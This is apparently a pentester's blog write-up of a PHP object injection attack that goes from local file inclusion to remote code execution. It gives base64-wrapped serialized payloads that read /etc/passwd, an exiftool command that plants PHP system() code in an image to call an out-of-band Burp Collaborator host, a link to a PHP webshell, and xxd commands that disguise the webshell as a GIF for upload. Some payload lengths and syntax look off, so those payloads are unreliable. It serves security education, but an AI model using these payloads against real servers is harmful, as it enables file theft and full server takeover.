PHPObjectInjection
LFI to RCE
Hello readers, today we are gonna talk about PHPObjectInjection and leveraging the power of Reflection to modify the serialized objects and access any arbitrary files from the server, later we will learn how to convert it into an RCE (Remote Code Execution). let the hunt begin;
What is PHPObjectInjection?
Before we talk about the attack, let’s understand what is Serialization? I hope you must be having an idea about it, lets have a revision,
Serialization is basically converting a set of data structures or objects into a stream of bytes to transmit it to a memory, a database, or a file. The main advantage of this technology is to save the state of an object to be able to recreate it whenever needed, eg. video games, etc.
Areas of Risks
Along with the advantage this technology also has its disadvantages. This vulnerability could occur when user-supplied input is not appropriately sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, a malicious actor could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
To successfully exploit a PHP Object Injection vulnerability the following two conditions must be met:
1. The application must have a class that implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”.
2. All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes.
Attack Story
During a recent Pen-Test, I came across an interesting piece of PHP code that could lead to RCE, but the exploitation was a bit tricky. After spending some sleepless nights trying to break this code, I identified that both application and system-level code execution was possible using the vulnerability.
The vulnerable Code:
In the above code, a user-controlled value can be passed on to a PHP un-serialization function. The application accepts a “filename” which gets called, and the output is then fed to a PHP unserialize module. With the above bug both application level and system-level code, executions are possible. For exploiting this vulnerability both the conditions are satisfied.
Serialization example:
Serializing a 3 char string array
Understanding the serialized string
In my pentest, I found an instance where the “file” parameter was carrying a base64 encoded payload, later identified to be a serialized object as shown in Figure below;
Serialized value after decoding
“O:8:”HTMLFile”:1:{s:8:”filename”;s:9:”help.html”;}”
On the response side if you’d see, we have another code that has a class named “IncludeFile” a vulnerable function “filename” and a magic function “function __toString()”, here we have an advantage to craft our own payload so let’s make our own payload.
O:11:”IncludeFile”:1:{s:8:”filename”;s11:”/etc/passwd”;}
This is our payload; pretty easy to understand, I have just replaced the class name, make sure the string chars and lengths are exactly matching as shown in the above payload.
This is cool, let’s base64 encode it, and boom!! it worked
Using the power of reflection we were able to modify the serialized objects and access any arbitrary files from the server!! Isn't this amazing??
Let’s move on to RCE!
So I had a file upload functionality, and this functionality only allows the image files to be uploaded, how this can be turned into a Remote Code Execution??
1. Create an Image file with PHP code using EXIF or any other image utility tool
2. Upload the file and locate the path
3. Utilize LFI include image file and make an Out of Band call to confirm the code execution
4. Make use of a PHP webshell, convert it into a image file, upload it and run arbitrary commands
We will be using the EXIF tool with the following command:
“exiftool -Comment=’<?php system(“nslookup 4lqd7k2ulofzkiwzv0m5gf7qohu8ix.burpcollaborator.net”); ?>’ beingsecure.jpeg”
Let’s upload the file.
Now, let’s utilize the LFI include image file to make an out-of-band call, so our payload will look like this; further, we have to base64 encode it.
O:11:”IncludeFile”:1:{s:8:”filename”;s:38:”/var/www/html/uploads/beingsecure.jpeg”;}
As shown in the Figure below, we have successfully made an out-of-band call that confirms the execution.
Now, let’s try to upload a web shell, you can get a PHP web shell on the following link;
https://github.com/drag0s/php-webshell/blob/master/webshell.php
First, we have to convert the .PHP file into .hex using the following command
xxd -plain w3bsh3ll.php > tenor.hex
Dump this .hex file into an image/gif file using the following command
xxd -plain -revert tenor.hex antara.gif
Now, we can upload this file onto the server
Once again, let’s utilize the LFI to include image file to run arbitrary commands on the server, our payload will look like;
O:11:”IncludeFile”:1:{s:8:”filename”;s:38:”/var/www/html/uploads/antara.gif”;}
And yes!! we have successfully uploaded the PHP webshell
So now you can run arbitrary commands on the server!!
Thank you All for making out the time and reading this article.
Stay Tuned for another interesting attack!!
You can connect with me @https://github.com/InfoSecAntara